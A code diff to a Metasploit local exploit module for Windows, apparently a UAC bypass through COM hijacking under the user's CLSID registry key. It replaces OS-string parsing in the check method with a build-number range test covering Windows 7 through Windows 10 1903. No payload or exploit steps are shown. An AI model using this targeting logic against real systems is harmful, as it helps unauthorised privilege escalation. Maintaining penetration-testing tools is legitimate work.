@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Post::Windows::Priv
   include Post::Windows::Registry
   include Post::Windows::Runas
+  include Post::Windows::Version
   include Exploit::FileDropper
 
   CLSID_PATH = 'HKCU\\Software\\Classes\\CLSID'.freeze
@@ -69,25 +70,13 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    vprint_status("System OS Detected: #{sysinfo['OS']}")
+    version_info = get_version_info
+    vprint_status("System OS Detected: #{version_info.product}")
     # return CheckCode::Safe('UAC is not enabled') unless is_uac_enabled?
-    if sysinfo['OS'] =~ /Windows (7|8|2008|2012)/
+    if version_info.build_number.between?(Msf::WindowsVersion::Win7, Msf::WindowsVersion::Win10_1903)
       return CheckCode::Appears
     end
 
-    if sysinfo['OS'] =~ /Windows (10|2016)/
-      sysinfo_value = sysinfo['OS']
-      build_num_arr = sysinfo_value.split('Build')
-      return CheckCode::Safe('Unable to determine build Number') if build_num_arr.length < 2
-
-      build_num = build_num_arr[1].to_i
-      vprint_status("Detected build number: #{build_num}")
-      if build_num < 18362
-        return CheckCode::Appears
-      else
-        return CheckCode::Safe
-      end
-    end
     return CheckCode::Safe
   end
 
